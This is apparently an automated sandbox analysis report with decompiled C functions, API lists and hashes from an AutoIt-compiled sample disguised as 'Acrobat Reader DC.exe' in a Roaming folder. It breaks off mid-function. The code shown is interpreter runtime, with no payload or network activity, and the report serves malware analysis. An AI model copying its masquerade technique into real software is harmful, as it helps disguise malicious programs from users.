                                  control_flow_graph 1316 40f5c0-40f5cf call 422240 1319 40f5d0-40f5e8 1316->1319 1319->1319 1320 40f5ea-40f613 call 413650 call 410e60 1319->1320 1325 40f614-40f633 call 414d04 1320->1325 1328 40f691 1325->1328 1329 40f635-40f63c 1325->1329 1330 40f696-40f69c 1328->1330 1331 40f660-40f674 call 4150d1 1329->1331 1332 40f63e 1329->1332 1336 40f679-40f67c 1331->1336 1333 40f640 1332->1333 1335 40f642-40f650 1333->1335 1337 40f652-40f655 1335->1337 1338 40f67e-40f68c 1335->1338 1336->1325 1341 40f65b-40f65e 1337->1341 1342 425d1e-425d3e call 4150d1 call 414d04 1337->1342 1339 40f68e-40f68f 1338->1339 1340 40f69f-40f6ad 1338->1340 1339->1337 1343 40f6b4-40f6c2 1340->1343 1344 40f6af-40f6b2 1340->1344 1341->1331 1341->1333 1352 425d43-425d5f call 414d30 1342->1352 1347 425d16 1343->1347 1348 40f6c8-40f6d6 1343->1348 1344->1337 1347->1342 1350 425d05-425d0b 1348->1350 1351 40f6dc-40f6df 1348->1351 1350->1335 1353 425d11 1350->1353 1351->1337 1352->1330 1353->1347
                                  C-Code - Quality: 88%
                                  			E0040F5C0(intOrPtr* _a4) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v65572;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t53;
                                  				void* _t58;
                                  				signed int _t59;
                                  				signed int _t70;
                                  				void* _t80;
                                  				void* _t87;
                                  				void* _t92;
                                  				void* _t95;
                                  				void* _t97;
                                  				void* _t98;
                                  				void* _t99;
                                  				void* _t100;
                                  
                                  				E00422240(0x10020);
                                  				_t53 = 0;
                                  				do {
                                  					_t1 = _t53 + 0x4921a0; // 0xbe4b48a3
                                  					_t2 = _t53 + 0x492198; // 0xa534c99
                                  					 *((char*)(_t97 + _t53 - 0x20)) =  *_t1;
                                  					 *((char*)(_t97 + _t53 - 0x18)) =  *_t2;
                                  					_t53 = _t53 + 1;
                                  				} while (_t53 < 8);
                                  				E00413650( &_v12, "AU3!");
                                  				E00410E60( &_v20,  &_v12, 4);
                                  				_t99 = _t98 + 0x14;
                                  				_push(_t73);
                                  				_v16 = 0;
                                  				while(1) {
                                  					_t58 = E00414D04( &_v65572, 1, 0x10000,  *_a4); // executed
                                  					_t100 = _t99 + 0x10;
                                  					if(_t58 < 0x18) {
                                  						break;
                                  					}
                                  					_t92 = _t58;
                                  					_t13 = _t92 - 0x14; // -20
                                  					_t95 = _t13;
                                  					if(_t95 <= 0) {
                                  						L10:
                                  						_t22 = _t92 - 0x14; // -20
                                  						_push(1);
                                  						_push(0xffffffec);
                                  						_push( *_a4);
                                  						_v16 = _v16 + _t22;
                                  						E004150D1(_t73, _v16 + _t22, _t92, _t95, _t110); // executed
                                  						_t99 = _t100 + 0xc;
                                  						continue;
                                  					} else {
                                  						_t87 = 0;
                                  						do {
                                  							_t80 = 0;
                                  							while(1) {
                                  								_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x20));
                                  								if( *((intOrPtr*)(_t97 + _t80 - 0x20)) !=  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x10020))) {
                                  									break;
                                  								}
                                  								_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1f));
                                  								__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1f)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001f));
                                  								if(__eflags == 0) {
                                  									_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1e));
                                  									__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1e)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001e));
                                  									if(__eflags == 0) {
                                  										_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1d));
                                  										__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1d)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001d));
                                  										if(__eflags != 0) {
                                  											_t80 = _t80 + 3;
                                  											break;
                                  										} else {
                                  											_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1c));
                                  											__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1c)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001c));
                                  											if(__eflags == 0) {
                                  												_t80 = _t80 + 5;
                                  												__eflags = _t80 - 0x14;
                                  												if(__eflags < 0) {
                                  													continue;
                                  												} else {
                                  													break;
                                  												}
                                  											} else {
                                  												_t80 = _t80 + 4;
                                  												break;
                                  											}
                                  										}
                                  									} else {
                                  										_t80 = _t80 + 2;
                                  										break;
                                  									}
                                  								} else {
                                  									_t80 = _t80 + 1;
                                  									break;
                                  								}
                                  								L24:
                                  							}
                                  							if(_t80 == 0x14) {
                                  								_t96 = _a4;
                                  								_t47 = _t87 + 0x14; // 0x14
                                  								_push(0);
                                  								_push(_v16 + _t47);
                                  								_push( *_a4); // executed
                                  								E004150D1(_t73,  *_a4, _t92, _a4, __eflags); // executed
                                  								E00414D04( &_v12, 1, 4,  *_t96); // executed
                                  								_v8 = 0;
                                  								_t70 = E00414D30( &_v12, "EA06");
                                  								asm("sbb eax, eax");
                                  								_t59 =  ~_t70 & 0x00000004;
                                  							} else {
                                  								goto L9;
                                  							}
                                  							goto L14;
                                  							L9:
                                  							_t87 = _t87 + 1;
                                  							_t110 = _t87 - _t95;
                                  						} while (_t87 < _t95);
                                  						goto L10;
                                  					}
                                  					L14:
                                  					return _t59;
                                  					goto L24;
                                  				}
                                  				_t59 = 3;
                                  				goto L14;
                                  			}

























                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_fseek_memmove
                                  • String ID: AU3!$EA06
                                  • API String ID: 3969463491-2658333250
                                  • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                  • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 4115d7-4115df 1357 4115ee-4115f9 call 4135bb 1356->1357 1360 4115e1-4115ec call 411988 1357->1360 1361 4115fb-4115fc 1357->1361 1360->1357 1364 4115fd-41160e 1360->1364 1365 411610-41163b call 417fc0 call 41130a 1364->1365 1366 41163c-411656 call 4180af call 418105 1364->1366 1365->1366
                                  C-Code - Quality: 92%
                                  			E004115D7(void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                  				intOrPtr _v0;
                                  				char _v8;
                                  				char _v20;
                                  				void* _t11;
                                  				struct HINSTANCE__* _t12;
                                  				struct HINSTANCE__* _t16;
                                  				void* _t26;
                                  				void* _t27;
                                  				void* _t29;
                                  
                                  				_t29 = __esi;
                                  				_t27 = __edi;
                                  				while(1) {
                                  					_t11 = E004135BB(_t26, _t27, _t29, _a4); // executed
                                  					if(_t11 != 0) {
                                  						break;
                                  					}
                                  					_t12 = E00411988(_a4);
                                  					__eflags = _t12;
                                  					if(_t12 == 0) {
                                  						__eflags =  *0x49664c & 0x00000001;
                                  						if(( *0x49664c & 0x00000001) == 0) {
                                  							 *0x49664c =  *0x49664c | 0x00000001;
                                  							__eflags =  *0x49664c;
                                  							_push(1);
                                  							_v8 = "bad allocation";
                                  							E00417FC0(0x496640,  &_v8);
                                  							 *0x496640 = 0x482a2c;
                                  							E0041130A( *0x49664c, 0x425bee);
                                  						}
                                  						E004180AF( &_v20, 0x496640);
                                  						_v20 = 0x482a2c;
                                  						E00418105( &_v20, 0x48ceac);
                                  						asm("int3");
                                  						_t16 = GetModuleHandleW(L"mscoree.dll");
                                  						__eflags = _t16;
                                  						if(_t16 != 0) {
                                  							_t16 = GetProcAddress(_t16, "CorExitProcess");
                                  							__eflags = _t16;
                                  							if(_t16 != 0) {
                                  								return _t16->i(_v0);
                                  							}
                                  						}
                                  						return _t16;
                                  					} else {
                                  						continue;
                                  					}
                                  					L11:
                                  				}
                                  				return _t11;
                                  				goto L11;
                                  			}













                                  APIs
                                  • _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • std::exception::exception.LIBCMT ref: 00411626
                                  • std::exception::exception.LIBCMT ref: 00411640
                                  • __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                  • String ID: ,*H$4*H$@fI
                                  • API String ID: 615853336-1459471987
                                  • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                  • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1375 4102b0-4102c5 SHGetMalloc 1376 4102cb-4102da SHGetDesktopFolder 1375->1376 1377 425dfd-425e0e call 433244 1375->1377 1378 4102e0-41031a call 412fba 1376->1378 1379 41036b-410379 1376->1379 1387 410360-410368 1378->1387 1388 41031c-410331 SHGetPathFromIDListW 1378->1388 1379->1377 1385 41037f-410384 1379->1385 1387->1379 1389 410351-41035d 1388->1389 1390 410333-41034a call 412fba 1388->1390 1389->1387 1390->1389
                                  C-Code - Quality: 62%
                                  			E004102B0(void* __ebx, void* __edi, void* __esi) {
                                  				void* _v8;
                                  				void* _v12;
                                  				char _v16;
                                  				char _v20;
                                  				short _v24;
                                  				char _v544;
                                  				char _v1068;
                                  				char* _t21;
                                  				intOrPtr* _t24;
                                  				intOrPtr* _t29;
                                  				void* _t31;
                                  				intOrPtr* _t32;
                                  				intOrPtr* _t34;
                                  				void* _t38;
                                  				void* _t55;
                                  				void* _t57;
                                  
                                  				_t55 = __edi;
                                  				_t38 = __ebx;
                                  				_t21 =  &_v8;
                                  				__imp__SHGetMalloc(_t21); // executed
                                  				if(_t21 != 0) {
                                  					L9:
                                  					E00433244(_t55, _t38, 0x105);
                                  					return 0;
                                  				} else {
                                  					_t57 = 0; // executed
                                  					__imp__SHGetDesktopFolder( &_v12, __esi); // executed
                                  					if(_t21 == 0) {
                                  						E00412FBA( &_v544, __ebx, 0x104);
                                  						_v24 = 0;
                                  						_t29 = _v12;
                                  						_t31 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0xc))))(_t29, 0, 0,  &_v544,  &_v20,  &_v16, 0); // executed
                                  						if(_t31 == 0) {
                                  							__imp__SHGetPathFromIDListW(_v16,  &_v1068); // executed
                                  							_t57 = _t31;
                                  							if(_t57 != 0) {
                                  								E00412FBA(__edi,  &_v1068, 0x104);
                                  								 *((short*)(__edi + 0x208)) = 0;
                                  							}
                                  							_t34 = _v8;
                                  							 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x14))))(_t34, _v16);
                                  						}
                                  						_t32 = _v12;
                                  						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 8))))(_t32);
                                  					}
                                  					_t24 = _v8;
                                  					 *((intOrPtr*)( *((intOrPtr*)( *_t24 + 8))))(_t24);
                                  					if(_t57 == 0) {
                                  						goto L9;
                                  					} else {
                                  						return 1;
                                  					}
                                  				}
                                  			}




















                                  APIs
                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                  • _wcsncpy.LIBCMT ref: 004102ED
                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                  • _wcsncpy.LIBCMT ref: 00410340
                                  Strings
                                  Similarity
                                  • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                  • String ID: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 3170942423-3542460094
                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1393 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1396 427190-4271ae RegQueryValueExW 1393->1396 1397 40e4eb-40e4f0 1393->1397 1398 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1396->1398 1399 42721a-42722a RegCloseKey 1396->1399 1404 427210-427219 call 436508 1398->1404 1405 4271f7-42720e call 402160 1398->1405 1404->1399 1405->1404
                                  C-Code - Quality: 85%
                                  			E0040E4C0(void* __esi, void* __eflags) {
                                  				int _v8;
                                  				void* _v12;
                                  				char* _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				long _t23;
                                  				long _t34;
                                  				signed int _t37;
                                  				int _t42;
                                  				void* _t57;
                                  				char* _t58;
                                  
                                  				E00403350(__esi);
                                  				_t23 = RegOpenKeyExW(0x80000001, L"Software\\AutoIt v3\\AutoIt", 0, 1,  &_v12); // executed
                                  				if(_t23 == 0) {
                                  					_t42 = 0;
                                  					__eflags = RegQueryValueExW(_v12, L"Include", 0, 0, 0,  &_v8);
                                  					if(__eflags == 0) {
                                  						_push(_t57);
                                  						_push( ~(0 | __eflags > 0x00000000) | (_v8 + 0x00000001) * 0x00000002);
                                  						E0043652F(__eflags,  &_v20, E004115D7(_t57, __esi, __eflags));
                                  						_t58 = _v20;
                                  						_t55 = _v12;
                                  						_t34 = RegQueryValueExW(_v12, L"Include", 0, 0, _t58,  &_v8);
                                  						__eflags = _t34;
                                  						if(_t34 == 0) {
                                  							_t37 = _v8 >> 1;
                                  							_v8 = _t37;
                                  							__eflags = 0;
                                  							 *((short*)(_t58 + _t37 * 2)) = 0;
                                  							E00402160(__esi, _t58, _t55, _t58);
                                  							_t42 = 1;
                                  						}
                                  						E00436508( &_v20);
                                  					}
                                  					RegCloseKey(_v12);
                                  					return _t42;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}















                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                  Strings
                                  Similarity
                                  • API ID: QueryValue$CloseOpen
                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                  • API String ID: 1586453840-614718249
                                  • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                  • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1410 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                  C-Code - Quality: 100%
                                  			E00410570() {
                                  				struct HWND__* _t2;
                                  				struct HWND__* _t3;
                                  				int _t6;
                                  
                                  				_t2 = CreateWindowExW(0, L"AutoIt v3", L"AutoIt v3", 0xcf0000, 0x80000000, 0x80000000, 0x12c, 0x64, 0, 0,  *0x497520, 0); // executed
                                  				 *0x497518 = _t2; // executed
                                  				_t3 = CreateWindowExW(0, L"edit", 0, 0x50b008c4, 0, 0, 0, 0, _t2, 1,  *0x497520, 0); // executed
                                  				 *0x497514 = _t3; // executed
                                  				ShowWindow( *0x497518, 0); // executed
                                  				_t6 = ShowWindow( *0x497518, 0); // executed
                                  				return _t6;
                                  			}







                                  APIs
                                  • CreateWindowExW.USER32 ref: 004105A5
                                  • CreateWindowExW.USER32 ref: 004105CE
                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                  Strings
                                  Similarity
                                  • API ID: Window$CreateShow
                                  • String ID: AutoIt v3$edit
                                  • API String ID: 1584632944-3779509399
                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040F250(short* __edx, char* __esi, void* _a4, short* _a8, intOrPtr _a12) {
                                  				int _v8;
                                  				void* _v12;
                                  				int* _t19;
                                  				long _t22;
                                  				signed int _t27;
                                  				int _t44;
                                  
                                  				 *__esi = 0;
                                  				_t19 = RegOpenKeyExW(_a4, __edx, 0, 1,  &_v12); // executed
                                  				if(_t19 != 0) {
                                  					return 0;
                                  				} else {
                                  					_t44 = _a12 + _a12;
                                  					_v8 = _t44;
                                  					_t22 = RegQueryValueExW(_v12, _a8, _t19, _t19, __esi,  &_v8); // executed
                                  					if(_t22 != 0) {
                                  						RegCloseKey(_v12);
                                  						return 0;
                                  					} else {
                                  						_t27 = _v8 >> 1;
                                  						_v8 = _t27;
                                  						if(_t27 >= _a12) {
                                  							 *((short*)(_t44 + __esi - 2)) = 0;
                                  						} else {
                                  							 *((short*)(__esi + _t27 * 2)) = 0;
                                  						}
                                  						RegCloseKey(_v12); // executed
                                  						return 1;
                                  					}
                                  				}
                                  			}










                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                  Strings
                                  Similarity
                                  • API ID: Close$OpenQueryValue
                                  • String ID: Control Panel\Mouse
                                  • API String ID: 1607946009-824357125
                                  • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                  • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                  • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                  • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E00414ABA(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                  				signed int _v8;
                                  				char* _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t82;
                                  				char _t89;
                                  				signed int _t96;
                                  				signed int _t98;
                                  				signed int _t101;
                                  				signed int _t104;
                                  				signed int _t108;
                                  				signed int _t109;
                                  				char* _t110;
                                  				signed int _t120;
                                  				signed int _t123;
                                  				signed int _t124;
                                  				signed int _t125;
                                  				signed int _t126;
                                  				void* _t127;
                                  
                                  				_t110 = _a4;
                                  				_t108 = _a8;
                                  				_t123 = _a12;
                                  				_v12 = _t110;
                                  				_v8 = _t108;
                                  				if(_t123 == 0 || _a16 == 0) {
                                  					L5:
                                  					return 0;
                                  				} else {
                                  					_t131 = _t110;
                                  					if(_t110 != 0) {
                                  						_t126 = _a20;
                                  						__eflags = _t126;
                                  						if(_t126 == 0) {
                                  							L9:
                                  							__eflags = _t108 - 0xffffffff;
                                  							if(_t108 != 0xffffffff) {
                                  								_t82 = E00412F40(_t110, 0, _t108);
                                  								_t127 = _t127 + 0xc;
                                  							}
                                  							__eflags = _t126;
                                  							if(__eflags == 0) {
                                  								goto L3;
                                  							} else {
                                  								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                                  								if(__eflags > 0) {
                                  									goto L3;
                                  								}
                                  								L13:
                                  								_t124 = _t123 * _a16;
                                  								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                  								_v20 = _t124;
                                  								_t109 = _t124;
                                  								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                  									_v16 = 0x1000;
                                  								} else {
                                  									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                  								}
                                  								__eflags = _t124;
                                  								if(_t124 == 0) {
                                  									L40:
                                  									return _a16;
                                  								} else {
                                  									do {
                                  										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                  										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                  											L24:
                                  											__eflags = _t109 - _v16;
                                  											if(_t109 < _v16) {
                                  												_t89 = E0041D8F3(_t109, _t124, _t126); // executed
                                  												__eflags = _t89 - 0xffffffff;
                                  												if(_t89 == 0xffffffff) {
                                  													L45:
                                  													return (_t124 - _t109) / _a12;
                                  												}
                                  												__eflags = _v8;
                                  												if(_v8 == 0) {
                                  													L41:
                                  													__eflags = _a8 - 0xffffffff;
                                  													if(__eflags != 0) {
                                  														E00412F40(_a4, 0, _a8);
                                  													}
                                  													 *((intOrPtr*)(E00417F77(__eflags))) = 0x22;
                                  													L4:
                                  													E00417F25();
                                  													goto L5;
                                  												}
                                  												_v12 = _v12 + 1;
                                  												 *_v12 = _t89;
                                  												_t109 = _t109 - 1;
                                  												_t65 =  &_v8;
                                  												 *_t65 = _v8 - 1;
                                  												__eflags =  *_t65;
                                  												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                  												goto L39;
                                  											}
                                  											__eflags = _v16;
                                  											if(_v16 == 0) {
                                  												_t96 = 0x7fffffff;
                                  												__eflags = _t109 - 0x7fffffff;
                                  												if(_t109 <= 0x7fffffff) {
                                  													_t96 = _t109;
                                  												}
                                  											} else {
                                  												__eflags = _t109 - 0x7fffffff;
                                  												if(_t109 <= 0x7fffffff) {
                                  													_t50 = _t109 % _v16;
                                  													__eflags = _t50;
                                  													_t120 = _t50;
                                  													_t101 = _t109;
                                  												} else {
                                  													_t120 = 0x7fffffff % _v16;
                                  													_t101 = 0x7fffffff;
                                  												}
                                  												_t96 = _t101 - _t120;
                                  											}
                                  											__eflags = _t96 - _v8;
                                  											if(_t96 > _v8) {
                                  												goto L41;
                                  											} else {
                                  												_push(_t96);
                                  												_push(_v12);
                                  												_push(E00414139(_t126)); // executed
                                  												_t98 = E0041DFCC(_t109, _t124, _t126, __eflags); // executed
                                  												_t127 = _t127 + 0xc;
                                  												__eflags = _t98;
                                  												if(_t98 == 0) {
                                  													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                                  													goto L45;
                                  												}
                                  												__eflags = _t98 - 0xffffffff;
                                  												if(_t98 == 0xffffffff) {
                                  													L44:
                                  													_t72 = _t126 + 0xc;
                                  													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                                  													__eflags =  *_t72;
                                  													goto L45;
                                  												}
                                  												_v12 = _v12 + _t98;
                                  												_t109 = _t109 - _t98;
                                  												_v8 = _v8 - _t98;
                                  												goto L39;
                                  											}
                                  										}
                                  										_t104 =  *(_t126 + 4);
                                  										__eflags = _t104;
                                  										if(__eflags == 0) {
                                  											goto L24;
                                  										}
                                  										if(__eflags < 0) {
                                  											goto L44;
                                  										}
                                  										_t125 = _t109;
                                  										__eflags = _t109 - _t104;
                                  										if(_t109 >= _t104) {
                                  											_t125 = _t104;
                                  										}
                                  										__eflags = _t125 - _v8;
                                  										if(_t125 > _v8) {
                                  											goto L41;
                                  										} else {
                                  											E0041E0C2(_v12, _v8,  *_t126, _t125);
                                  											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                                  											 *_t126 =  *_t126 + _t125;
                                  											_v12 = _v12 + _t125;
                                  											_t109 = _t109 - _t125;
                                  											_t127 = _t127 + 0x10;
                                  											_v8 = _v8 - _t125;
                                  											_t124 = _v20;
                                  										}
                                  										L39:
                                  										__eflags = _t109;
                                  									} while (_t109 != 0);
                                  									goto L40;
                                  								}
                                  							}
                                  						}
                                  						_t82 = (_t82 | 0xffffffff) / _t123;
                                  						__eflags = _a16 - _t82;
                                  						if(_a16 <= _t82) {
                                  							goto L13;
                                  						}
                                  						goto L9;
                                  					}
                                  					L3:
                                  					 *((intOrPtr*)(E00417F77(_t131))) = 0x16;
                                  					goto L4;
                                  				}
                                  			}



























                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                  • String ID:
                                  • API String ID: 4048096073-0
                                  • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                  • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                  • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                  • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040F520(short* __eax, void* __esi, void* __fp0, intOrPtr _a4) {
                                  				intOrPtr _v36;
                                  				intOrPtr _v44;
                                  				char* _v48;
